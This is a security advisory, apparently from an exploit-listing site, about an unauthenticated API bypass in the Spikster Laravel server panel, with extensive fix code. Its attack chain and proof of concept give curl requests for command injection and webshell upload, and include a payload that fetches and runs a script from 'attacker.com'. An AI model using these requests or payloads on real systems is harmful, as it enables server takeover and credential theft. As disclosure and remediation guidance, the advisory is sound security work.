## https://sploitus.com/exploit?id=6C8D14DF-B702-55D0-8ABE-340E544A4D32
# GitHub Security Advisory: Spikster - Complete API Authentication Bypass
---
## Advisory Information
| Field | Value |
|-------|-------|
| **Severity** | Critical |
| **CWE** | CWE-306 (Missing Authentication for Critical Function) |
| **CVSS v3.1** | 10.0 |
| **CVSS Vector** | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
---
## Summary
The Spikster server management panel (Laravel-based cPanel alternative) has its **entire API authentication middleware commented out**, allowing unauthenticated attackers to execute arbitrary shell commands on managed servers, read/write/delete arbitrary files, and access all SSH/MySQL credentials.
---
## Vulnerability Details
### Affected Package/Repository
- **Repository:** `spikster/site-manager` (Laravel server management panel)
- **Affected Versions:** Current (all versions audited)
- **Patched Version:** N/A (0-day)
- **Commit Hash (audited):** `e1cdf8c4b780c87457b548c38a87982b549e2465`
### Description
**Root Cause:** The `CipiAuth` middleware at `app/Http/Middleware/CipiAuth.php` has its entire authentication logic commented out (lines 24-72). Every API route in `routes/api.php` uses the `api` middleware group, which includes only throttling, NO authentication.
**Three separate auth bypass vectors:**
1. **API routes (`/api/*`):** The `api` middleware group has no auth middleware. All API endpoints return data without authentication.
2. **Shell/Config routes (`/sh/*`, `/conf/*`):** These routes serve shell scripts with embedded passwords. They have **zero middleware**, no auth at all.
3. **File manager routes:** The `FileManagerController` is registered in `api.php` with no auth middleware, allowing arbitrary file read/write/delete on the server filesystem.
The middleware file `CipiAuth.php` lines 24-72:
```php
// THE ENTIRE AUTH HANDLER IS COMMENTED OUT:
// public function handle($request, Closure $next)
// {
// ... all auth logic removed ...
// }
```
### Attack Chain (Total Server Takeover in 30 seconds):
1. `GET /api/servers` → Returns all servers with IPs, SSH credentials
2. `POST /api/servers/{id}/packages/install` with `{"package": "nginx;curl attacker.com/shell.sh|bash"}` → RCE
3. `POST /files/store` → Write PHP webshell to webroot
### Additional Vulnerabilities in Same Codebase:
- **12 command injection vectors** via unsanitized user input in SSH exec (Site creation, SSL, PHP version change, Node.js setup, MySQL password reset, supervisor config)
- **Hardcoded default credentials:** `admin@localhost / password` in `config/cipi.php`
- **Hardcoded MySQL password** fallback in `DatabaseService.php`
- **Hardcoded panel password** `'Secret_123'` in `ServerController.php`
- **Credentials in GET URL** for PMA auto-login
- **Credentials in process listing** (all SSH jobs pass passwords via `echo | sudo -S`)
- **No CSRF protection**
- **Complete IDOR:** no `user_id` on Site/Server models
---
## Impact
- **Complete server compromise:** attacker can execute arbitrary commands on ALL managed servers
- **Credential theft:** all SSH keys, MySQL passwords, server credentials exposed
- **Arbitrary file read/write/delete** on web server filesystem
- **Data breach:** all customer data, server configurations, database contents
- **Lateral movement:** access to all servers managed by the panel
---
## Proof of Concept
### Step 1: List all managed servers (unauthenticated)
```bash
curl -s http://target.example.com/api/servers
```
Returns JSON with all server IPs, hostnames, SSH credentials.
### Step 2: Execute command on target server (unauthenticated)
```bash
curl -X POST http://target.example.com/api/servers/1/packages/install \
-H "Content-Type: application/json" \
-d '{"package": "nginx; id > /var/www/html/pwned.txt"}'
```
### Step 3: Write arbitrary file via File Manager (unauthenticated)
```bash
curl -X POST http://target.example.com/files/store \
-H "Content-Type: application/json" \
-d '{"content": {"pathName": "/var/www/html/shell.php"}, "data": ""}'
```
### Step 4: Access webshell
```bash
curl http://target.example.com/shell.php?cmd=whoami
```
---
## Patches / Fix
### Immediate Fix:
```php
<?php
// In app/Http/Middleware/CipiAuth.php: UNCOMMENT the auth handler
namespace App\Http\Middleware;

use Closure;

class CipiAuth
{
    public function handle($request, Closure $next)
    {
        // Reject any request that does not carry an authenticated user
        if (!$request->user()) {
            return response()->json(['error' => 'Unauthorized'], 401);
        }
        return $next($request);
    }
}
```
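Restoring the handler is necessary but not sufficient: the advisory notes that the `api` group carries only throttling and that the `/sh/*`, `/conf/*` and file-manager routes carry no middleware at all, so the middleware must also be aliased and attached to every sensitive route. The following is an added illustration of that wiring, not Spikster's own code; the `cipi.auth` alias, the `auth:sanctum` guard, the controller method names and the Laravel 10 `$middlewareAliases` property are assumptions (earlier versions use `$routeMiddleware`).

```php
<?php
// app/Http/Kernel.php (excerpt, assumed layout): register the alias so routes can reference it
// protected $middlewareAliases = [
//     'cipi.auth' => \App\Http\Middleware\CipiAuth::class,
// ];

// routes/api.php: every route that reaches servers, files or credentials lives inside
// one authenticated group. Route paths follow the advisory; controller methods are assumed.
use App\Http\Controllers\FileManagerController;
use App\Http\Controllers\ServerController;
use Illuminate\Support\Facades\Route;

Route::middleware(['throttle:60,1', 'auth:sanctum', 'cipi.auth'])->group(function () {
    // Server inventory and package installation (the endpoints abused in the PoC)
    Route::get('/servers', [ServerController::class, 'index']);
    Route::post('/servers/{id}/packages/install', [ServerController::class, 'installPackage']);

    // File manager: previously registered with no middleware at all
    Route::post('/files/store', [FileManagerController::class, 'store']);
});

// Script/config endpoints (/sh/*, /conf/*) embed passwords and must not stay public.
// Assumed controller; the point is that they sit under the same guard.
Route::middleware(['auth:sanctum', 'cipi.auth'])->group(function () {
    Route::get('/sh/{name}', [ServerController::class, 'script']);
    Route::get('/conf/{name}', [ServerController::class, 'config']);
});
```

After wiring, confirm coverage rather than trusting the file: `php artisan route:list` (with `-v` on recent Laravel releases) prints the middleware stack per route, and any server, file or credential route whose stack lacks the auth guard is a regression of this advisory.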
### Additional Required Fixes:
1. Add `escapeshellarg()` to ALL SSH command constructions
2. Remove hardcoded credentials from `config/cipi.php`
3. Add `user_id` foreign key to Site/Server models for IDOR prevention
4. Add CSRF tokens to all state-changing endpoints
5. Never pass credentials via command-line arguments (use stdin or env vars)
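Fixes 1 and 5 above are easy to get subtly wrong, so here is an added example of how a practitioner would build the package-install command from the PoC safely; it is not Spikster's code, and the `SafeRemoteCommand` class, its allow-list contents and the use of `proc_open` for the local demonstration are assumptions. It combines an allow-list (the primary control) with `escapeshellarg()` (defence in depth) and feeds the `sudo -S` password over stdin instead of `echo 'pw' | sudo -S`, which leaves the secret visible in the process listing.

```php
<?php
// Added hardening example (not Spikster code). Demonstrates:
//   1. allow-listing plus escapeshellarg() for values spliced into shell commands
//   2. delivering the sudo password on stdin rather than in the argv string
final class SafeRemoteCommand
{
    // Assumed allow-list; a real panel would derive it from its supported stack
    private const ALLOWED_PACKAGES = ['nginx', 'php8.2-fpm', 'mariadb-server', 'nodejs'];

    public static function installPackage(string $package): string
    {
        if (!in_array($package, self::ALLOWED_PACKAGES, true)) {
            throw new InvalidArgumentException("package not in allow-list: {$package}");
        }
        // Quote even an allow-listed value so a later allow-list edit cannot reopen the hole
        return 'sudo -S apt-get install -y ' . escapeshellarg($package);
    }

    // Domains (site creation, SSL) need a syntactic check; quoting alone does not stop
    // a value like "a.com --flag" from being read as an option by the remote tool
    public static function domainArgument(string $domain): string
    {
        $re = '/^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/i';
        if (!preg_match($re, $domain)) {
            throw new InvalidArgumentException('invalid domain name');
        }
        return escapeshellarg($domain);
    }

    // Run a command locally, writing the secret to its stdin. The secret never
    // appears in argv, so `ps` on the host does not reveal it.
    public static function runWithStdinSecret(string $command, string $secret): array
    {
        $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
        $proc = proc_open($command, $spec, $pipes);
        if (!is_resource($proc)) {
            throw new RuntimeException('proc_open failed');
        }
        fwrite($pipes[0], $secret . "\n");
        fclose($pipes[0]);
        $stdout = stream_get_contents($pipes[1]);
        fclose($pipes[1]);
        $stderr = stream_get_contents($pipes[2]);
        fclose($pipes[2]);
        return ['code' => proc_close($proc), 'stdout' => $stdout, 'stderr' => $stderr];
    }
}

// Constructed inputs: the second one is the payload shape from the advisory's PoC
// and is rejected before any command string exists.
foreach (['nginx', 'nginx; id > /var/www/html/pwned.txt'] as $input) {
    try {
        echo SafeRemoteCommand::installPackage($input), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Over SSH the same rule applies: build the remote command string with these helpers and write the password to the channel's stdin (most SSH libraries expose a write on the exec channel) rather than composing `echo '<pw>' | sudo -S ...` on the remote side, which is what the advisory's "credentials in process listing" finding describes.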
---
## Disclosure Timeline
- **2026-06-28:** Vulnerability discovered by Fatullayev Asadbek (Kimdir01)
- **TBD:** Reported to maintainer
- **TBD:** CVE requested
- **TBD:** Advisory published
---
## Credits
- Discovered by: Fatullayev Asadbek | GitHub: Kimdir01
- Independent security researcher
---
## References
- CWE-306: Missing Authentication for Critical Function
- CWE-78: OS Command Injection
- CWE-798: Hardcoded Credentials